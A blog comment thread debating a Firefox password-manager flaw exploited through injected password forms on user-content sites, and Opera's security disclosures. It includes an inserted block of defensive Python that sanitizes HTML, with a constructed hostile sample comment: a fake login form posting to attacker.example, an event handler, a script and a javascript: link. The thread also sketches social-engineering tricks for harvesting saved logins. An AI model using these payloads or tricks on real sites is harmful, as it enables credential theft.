Is it maybe a bit convenient to blame web sites [...]
It is the web site's fault if they allow users to modify their website to make things they should not have been able to.

" 'We, we, we. That's Mozilla he's talking about. He works for Mozilla.'
Sure he does, but working for someone doesn't automatically make you a spokesperson... Also I noted that it might be incorrect..."

No, but if one is a Mozilla employee, and one makes pronouncements about Firefox and competing browsers, it gives one's words more weight than, say, the ordinary end user.

" 'Opera 9.10 has no unpatched vulnerabilities, from what I see.'
And no one claimed, from what I see. But you can be assured that many Opera users (even security hardliners) will think the same applies to Opera 9.02 because the changelog they read indicated that there were no security fixes."

Security hard-liners would know well enough to upgrade to a new version at the first opportunity.

" 'The thing is Opera fixed their moderate security issues, while Mozilla has not, and at the same time as Asa accuses Opera of downplaying security issues (as Secunia reports them as higher severity than Opera does) he also downplays an open security issue in Firefox.'
If the two Opera issues were only Moderately Critical then the Firefox issue is Not Critical at all going by Secunia..."

And oh yeah, the point was that whatever the severity of the vulnerability in Firefox, it's STILL THERE. And if it's a website issue, it would appear to me that it would run across the whole spectrum of browsers out there.

anon, actually it is a website issue and with very little additional social engineering, that bug can bite both IE and Opera. You really should read up a bit more on it before you spout off. The website flaw is more easily taken advantage of in Firefox than in IE or Opera, but it's still there in all of them.

Actually, it's even trickier to exploit it in Opera because the Wand is interactive. Firefox and (IIRC) IE will auto-fill saved login/passwords when you land on the page, while Opera won't do so until you click on a toolbar button.

FWIW, Opera mentioned changes in the format used to save wand data between 9.0x and 9.10. I assumed they were related to this issue.

Erg. Meant to mention that, given social engineering, one could convince the user to click on the wand, maybe with a fake session timeout page or something.

Kelson, I'm not sure what that wand data format change was. Unfortunately, I cannot investigate like I could with Mozilla where we have an open and transparent system.

You are right, it would be a bit more difficult to exploit in Opera than the other browsers, but it could still be done.

Ultimately though, this problem is the result of unsound development practices on sites that allow user generated content. They are failing to properly filter that content. Sites are learning, though, just as they learned years ago to filter inline scripts. (Would those advocating we fix this website flaw in Firefox have preferred if browser makers had removed support for inline scripts a few years back rather than putting that burden on webmasters that host user generated content?)

As Jesse explained nearly two months ago, the right solution was for myspace and similar sites to disallow input type="password" in user-generated content, the same way they disallow inline scripts and other hazards. Myspace agreed and fixed their site. Other sites with this problem are following suit.

Now, browser vendors can add features to help mitigate problems that arise from bad website coding practices, and they often do, (see the dependencies here) but that does not mean that the problem lies with the browser, it just means that we're all in this together trying to do best by the user.

I'm going to say it again, though. The posts I've made here aren't about how quickly fixed or how many security problems any browser has. That's a different argument and bringing it up here rather than discussing the actual contents of my posts is simply off-topic.
- A

If it can be exploited in a FF or IE Browser, but not in an Opera Browser, is it really the website's fault?

Whatever your answer is, that answer also applies to all other issues sites/users are "experiencing" with Opera.

For me, it was clear as hell that 9.1 would bring security fixes with it... they are ALWAYS fixing bugs and holes, even if they WERE NOT reported BY ANYONE, so does it make sense to include the sentence "contains the usual chunk of security and stability fixes" if every user knows that anyways?

Grah, the password issue can be exploited in any browser that stores passwords and offers a filling mechanism to the user. It takes varying degrees of social engineering depending on whether it's IE, Safari, or Opera, but all could be vulnerable with some fairly simple tricks. Firefox could change its implementation to be just like any of IE's, Safari's, or Opera's and users would still not be protected from this problem. The problem is that websites that allow user generated content should not be allowing password forms. There's just no reason to allow it and a lot of reason to disallow it like they do other features (inline scripts, etc.)

As for your suggestion that every user knows that every update contains security updates, I'd wager that either you didn't think that through or you have no idea how little the overwhelming majority of computer users actually understand.

- A

>>anon, actually it is a website issue and with very little additional social engineering, that bug can bite both IE and Opera. You really should read up a bit more on it before you spout off.

I'm not spouting off. I said "it appears to me".

>>Today I came across a short article at Heise Security that might go some way toward explaining why Opera flaws aren't discussed in the same way that flaws in the mainstream browsers, Firefox and IE, are.

Opera Software hides security vulnerabilities from their users, and from the public and the press.

Oops, sorry. Part of my comment in the above post got cut off. Anyway:

"Today I came across a short article at Heise Security that might go some way toward explaining why Opera flaws aren't discussed in the same way that flaws in the mainstream browsers, Firefox and IE, are.

Opera Software hides security vulnerabilities from their users, and from the public and the press."

Now *that* could be considered "spouting off". That little snippet cleverly suggests that the good Opera security record of the past might well have all been an illusion. I am a Mozilla fan, I use Mozilla products daily. But my affection for Mozilla doesn't erase my affection for *fairness*. You do raise some completely valid points though regarding Opera's lack of an auto-update mechanism, but then the original blog entry could have been framed differently to reflect that, and not attempts at FUD.

I am a bit baffled by Asa's story and I am still trying to understand why he tried to exploit an issue in order to lure the 1-2% Opera users to FireFox. Are things going that bad for FireFox nowadays? Isn't there a browser with a bigger market share to target? First of all, how many common people read changelogs? I don't. I don't care for them, because most of it is hocus pocus and impossible for me to verify. I just have to trust a company that they have done it. Just like Weird Al sang in Fat: "I am so fat that when I get a shoe shine, I have to take their word" . Just as you had to trust Heise in order to form 'your' opinion in order to downplay Opera.

Would an automatic update service make your browser safer? That depends: do I trust the vendor that they really have properly fixed the issues and in the process have not created other ones? In Opera I can also check for new updates, but mostly I just frequently, like most Opera users, check their website. Opera and FireFox users have in common that they are quite savvy and up-to-date, but since FireFox is getting a bigger marketshare, they must think of the "dummies" out there. Opera does not have that problem yet and I don't think it will ever come that far, because the desktop is not Opera's main market. Coming back to trusting a company. Who do you trust more: Opera or Mozilla. I go for Opera, because of their security record, their involvement in the community, the fact that they are company with a long and good history, their reputation and, since now, the fact that they do not use blogs in order to make other browsers look silly in order to promote their own.


"anon, actually it is a website issue and with very little additional social engineering, that bug can bite both IE and Opera. You really should read up a bit more on it before you spout off. The website flaw is more easily taken advantage of in Firefox than in IE or Opera, but it's still there in all of them."

At the risk of being seen to be "spouting off" again, the fact still remains that it's listed as a vulnerability by Secunia in Firefox 2.0.0.1, but not in Opera 9.10. Therefore, doesn't it make it a browser issue as much as a website issue? Wouldn't it be safer for users if Mozilla adopted something like Opera's Wand to replace the current Password Manager? ;)

anon, Secunia doesn't always get things right. Adopting a different UI just forces the attacker to adapt slightly. As Jesse put it, "It would hurt usability quite a bit on all sites, and it wouldn't really solve this security problem for myspace. It would just require the exploits to be a little more clever... the right solution is to tell myspace and similar sites to disallow input type="password" in user-generated content the same way they disallow XSS hazards like inline scripts, onclick, -moz-binding, etc." Additionally, "Few sites need this kind of extra protection from browsers. Sites that care about this kind of attack always care about XSS, and sites that care about XSS usually have tag and attribute whitelists that don't allow password form elements."

To make this even easier to grok, it's worth noting that you're currently participating on a site that allows user generated content. Everything you post to this comment thread is user generated content that my blog allows. You could attempt to put inline scripts or other dangerous content into my comments here and my blog is smart enough to disallow that. There's either a whitelist or a blacklist in the Movable Type software that (hopefully) disallows you from adding dangerous content to my blog through the comments. Claiming that browsers should have done that rather than websites and site CMSs like Movable Type would suggest that browsers should stop supporting inline scripts for all websites because a few, like this blog, could suffer if inline scripts were allowed to be added by commenters. That would be wrong and it would be a disservice to web developers and web users to remove or cripple a feature like inline scripts because it could be abused by someone on a site like this which allows user generated content.

To put all that very simply, I'll pose this question. If you can insert a script or other dangerous content by typing a comment here at my blog, is that the blog software's problem or the browser's? I'm saying it's the blog's fault and not the browser.

The obvious answer here is that those websites and CMSs that allow for user generated content need to add another item to their whitelist or blacklist that makes sure that input type=password cannot be used on those sites. There's even less reason for that to be used than inline scripts and other disallowed content which I can imagine a legitimate use for. Myspace and probably quite a few other sites and CMSs have already corrected this problem. Like blocking inline scripts, which is probably ubiquitous at sites allowing user generated content, this will soon be covered by all of the sites where it matters.

All of that doesn't mean that browser makers shouldn't be trying to find smart ways to prevent websites from doing unsmart things. It does mean, though, that the primary responsibility rests with the websites.
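The whitelist approach Asa and Jesse describe (enumerate the tags and attributes a commenter may use, so password inputs, inline scripts, onclick and -moz-binding never reach the page because they are simply not on the list) as an added example; this is my own constructed code, not Movable Type's, Myspace's or any real site's filter. A naive blacklist sits beside it to show why matching one spelling of `type="password"` is not enough; the tag set, sample comment and function names are assumptions.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed whitelist for user-generated comment HTML. Anything not listed
# here is dropped, which is why <input>, <form> and <script> never need to be
# named: the filter does not have to anticipate each hazardous element.
ALLOWED_TAGS = {"p", "a", "b", "i", "em", "strong", "blockquote", "code", "pre", "br"}
ALLOWED_ATTRS = {"a": {"href", "title"}}      # per-tag attribute whitelist
SAFE_HREF_PREFIXES = ("http://", "https://", "mailto:")
DROP_CONTENT_TAGS = {"script", "style"}       # drop the element body too


class WhitelistSanitizer(HTMLParser):
    """Rebuilds the input keeping only whitelisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropping = 0   # nesting depth inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.dropping += 1
            return
        if tag not in ALLOWED_TAGS or self.dropping:
            return          # not on the list: the tag vanishes, its text stays
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue    # onclick, style, type, ... never reach the output
            value = value or ""
            if name == "href" and not value.lower().startswith(SAFE_HREF_PREFIXES):
                continue    # javascript: and data: URLs are refused
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)   # <br/> is treated like <br>

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.dropping = max(0, self.dropping - 1)
        elif tag in ALLOWED_TAGS and not self.dropping:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(escape(data, quote=False))


def sanitize_comment(html):
    """Return the comment HTML reduced to the whitelist."""
    parser = WhitelistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


def blacklist_sanitize(html):
    """Naive blacklist: removes only the one spelling its author thought of."""
    return re.sub(r'<input[^>]*type="password"[^>]*>', "", html, flags=re.I)


def contains_password_field(html):
    """True if a password input survives, in any spelling a browser accepts."""
    return re.search(r"<input[^>]*type\s*=\s*['\"]?password", html, re.I) is not None


# Constructed hostile comment: a look-alike login form (unquoted, upper-case
# attribute spelling), an event handler, an inline script and a javascript: link.
SAMPLE_COMMENT = (
    '<p onclick="steal()">Log in again:</p>'
    '<form action="http://attacker.example/collect">'
    "<input name=u><INPUT TYPE=PASSWORD name=p></form>"
    '<script>document.title="x"</script>'
    '<a href="javascript:alert(1)">link</a>'
)

if __name__ == "__main__":
    print(sanitize_comment(SAMPLE_COMMENT))
    print("blacklist leaves a password field:",
          contains_password_field(blacklist_sanitize(SAMPLE_COMMENT)))
```

The whitelist output keeps the commenter's text and nothing that could imitate the host's login form, while the blacklist leaves the upper-case, unquoted `<INPUT TYPE=PASSWORD>` in place.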

'anon, Secunia doesn't always get things right. Adopting a different UI just forces the attacker to adapt slightly. As Jesse put it, "It would hurt usability quite a bit on all sites, and it wouldn't really solve this security problem for myspace. It would just require the exploits to be a little more clever... the right solution is to tell myspace and similar sites to disallow input type="password" in user-generated content the same way they disallow XSS hazards like inline scripts, onclick, -moz-binding, etc." '

To go off-topic a little bit: that being the case, it would seem that a better solution would lie with browsers (whatever browsers), if possible, than in expecting website authors to be always keeping their noses clean and using "proper" or "safe" code. What's to keep the input type="password" from showing up on any number of sites? (This is coming from a non-developer, obviously.)

@anon, if input type="password" shows up on a random site, that's perfectly safe. The vulnerability only exists when it shows up on the same site where the user has saved a password, and when it's in a form that imitates the login form well enough to trick the password manager.

Whether the HTML is "safe" or not in this case isn't about the code itself, but about who's providing it. Really, it boils down to the fact with any site that allows random people to contribute content, the web browser has no way to know which code comes from the host, and which code comes from outside users. It might be possible to make lists for specific sites, but then those would stop working the next time the site changed its layout.

Thanks, Kelson.

Beep: "Yes, deemed moderate by Opera, but critical most others."

Who knows Opera better, Opera or someone who only has a theoretical attack but can't show a real proof of concept?

Asa: "actually it is a website issue"

Actually this is a terrible excuse for bad security in Firefox. Don't blame others for your own security flaws. Firefox is bitten by this, Opera isn't. It's that simple.

You claim that it can be done in Opera, but you have no evidence that this is the case. Put your money where your mouth is or stop blaming sites for security holes in Firefox.

Asa, please stop your Opera-bashing. What did you yourself say on http://weblogs.mozillazine.org/asa/archives/2005/07/no_respect_for.html

You know it isn't fun to have people firing nasty comments at you--especially when they are uncalled for and completely untrue. So why do you do it to others? Because you can and you can get away with it? Perhaps. Opera truly has in heart their users and their friends and doesn't stab other browsers in the back.

Think about your own quote for a bit: "Webmasters, listen up. Respect your users or you will lose them. With Firefox, the user is no longer just a spectator, he's a participant. Play nice or face extinction. Seriously."

Play nice. Or. Face. Extinction.

asa, just accept that opera is better than FF, and opera is not disclosing security issues of their browser, they just need time to review whether the issue is true or it is just a hoax. accept that mozilla has limits and so does opera. so stop criticizing opera, instead be open-minded like the programs of mozilla, they're open-source